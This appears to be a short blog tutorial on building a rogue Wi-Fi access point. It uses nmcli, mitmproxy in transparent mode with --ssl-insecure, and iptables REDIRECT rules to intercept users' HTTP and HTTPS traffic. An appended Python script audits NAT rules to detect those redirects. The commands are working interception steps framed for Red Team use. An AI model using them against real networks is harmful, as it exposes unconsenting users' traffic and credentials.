Hi there! Rogue AP is an amazing technique! You can use it as part of your kill chain for Red Team ops, and you can use it for regular research involving wireless networks.

Nowadays most network traffic is encrypted with TLS or SSL, so you should not only establish the Rogue Access Point but also properly dissect the traffic it receives.

Mitmproxy could help with this task. It is an extendable HTTP/HTTPS proxy that’s easy to install and use. No huge configs and monstrous manpages - just plug and play.

Here are my notes about establishing the Rogue AP with MITMProxy in the middle. These are only my notes, not comprehensive usage info, so read the docs first.


Deploying AP

nmcli dev wifi hotspot ifname wlan0-or-your-wlan-iface ssid your-wlan-name password "very-secret-password"


Running MITMProxy

Keep in mind that the --ssl-insecure flag also disables the SNI check and so allows MITM of TLS-encrypted traffic, which MITMProxy re-terminates with a certificate it generates for each user's TLS session.

mitmproxy --mode transparent --showhost -p 8080 --ssl-insecure


Redirecting all TCP/80 and TCP/443 traffic to the MITMProxy

export INTERNET_IFACE=eth0
export AP_IFACE=wlan0

iptables -t nat -A PREROUTING -i "$AP_IFACE" -p tcp --dport 80 -j REDIRECT --to-port 8080
iptables -t nat -A PREROUTING -i "$AP_IFACE" -p tcp --dport 443 -j REDIRECT --to-port 8080

That’s all. Beautiful, isn’t it? Only NetworkManager, MITMProxy and some iptables magic.
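From the other side of the table: the two REDIRECT rules above are exactly what a transparent interception proxy needs, so their presence in the nat table of a gateway or hotspot host is a cheap, high-signal thing to audit for. The following is an added example written for this page (not code from the original post or from the mitmproxy project): it parses `iptables-save -t nat` style output and flags PREROUTING rules that REDIRECT or DNAT TCP/80 or TCP/443 to a local port. The sample rule set is constructed and assumes the usual `iptables-save` line format (`-m tcp --dport N ... --to-ports N`), which can differ slightly between iptables versions.

```python
"""Audit iptables NAT rules for transparent TCP/80 and TCP/443 redirection.

Added example, not part of the original post. Feed it the output of
`iptables-save -t nat` (e.g. via subprocess) and alert on any finding.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Ports whose redirection points at HTTP/HTTPS interception.
WEB_PORTS = {"80", "443"}


@dataclass
class Finding:
    iface: str    # ingress interface the rule matches, or "any"
    dport: str    # destination port being hijacked
    target: str   # REDIRECT or DNAT
    to: str       # where the traffic is sent instead
    rule: str     # the raw rule line, for the alert text


# Constructed sample of `iptables-save -t nat` output (assumption: format as
# printed by iptables-save). It mirrors the post's two REDIRECT rules and adds
# an SSH redirect and a masquerade rule that should not be flagged.
SAMPLE_NAT_RULES = """\
*nat
:PREROUTING ACCEPT [0:0]
:INPUT ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
:POSTROUTING ACCEPT [0:0]
-A PREROUTING -i wlan0 -p tcp -m tcp --dport 80 -j REDIRECT --to-ports 8080
-A PREROUTING -i wlan0 -p tcp -m tcp --dport 443 -j REDIRECT --to-ports 8080
-A PREROUTING -i eth0 -p tcp -m tcp --dport 22 -j REDIRECT --to-ports 2222
-A POSTROUTING -o eth0 -j MASQUERADE
COMMIT
"""

# Matches PREROUTING rules with an optional ingress interface, a --dport, and a
# REDIRECT (--to-port/--to-ports) or DNAT (--to-destination) target.
RULE_RE = re.compile(
    r"^-A PREROUTING(?:\s+-i\s+(?P<iface>\S+))?.*?"
    r"--dport\s+(?P<dport>\d+).*?-j\s+(?P<target>REDIRECT|DNAT)\s+"
    r"(?:--to-ports?\s+(?P<to>\S+)|--to-destination\s+(?P<to_dst>\S+))"
)


def find_web_redirects(iptables_save_text: str) -> list[Finding]:
    """Return one Finding per PREROUTING rule that diverts TCP/80 or TCP/443."""
    findings: list[Finding] = []
    for raw in iptables_save_text.splitlines():
        line = raw.strip()
        m = RULE_RE.match(line)
        if not m or m.group("dport") not in WEB_PORTS:
            continue
        findings.append(Finding(
            iface=m.group("iface") or "any",
            dport=m.group("dport"),
            target=m.group("target"),
            to=m.group("to") or m.group("to_dst"),
            rule=line,
        ))
    return findings


def report(findings: list[Finding]) -> list[str]:
    """Render findings as one alert line each (empty list means clean)."""
    return [
        f"ALERT: tcp/{f.dport} on {f.iface} is {f.target}ed to {f.to}: {f.rule}"
        for f in findings
    ]


if __name__ == "__main__":
    for line in report(find_web_redirects(SAMPLE_NAT_RULES)) or ["no web redirects found"]:
        print(line)
```

On a real host, replace `SAMPLE_NAT_RULES` with the captured output of `iptables-save -t nat` (or `nft list ruleset` after adapting the regex); the SSH rule in the sample is deliberately ignored so the check only fires on the web ports a TLS-interception proxy would hijack.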

Good Luck!

The end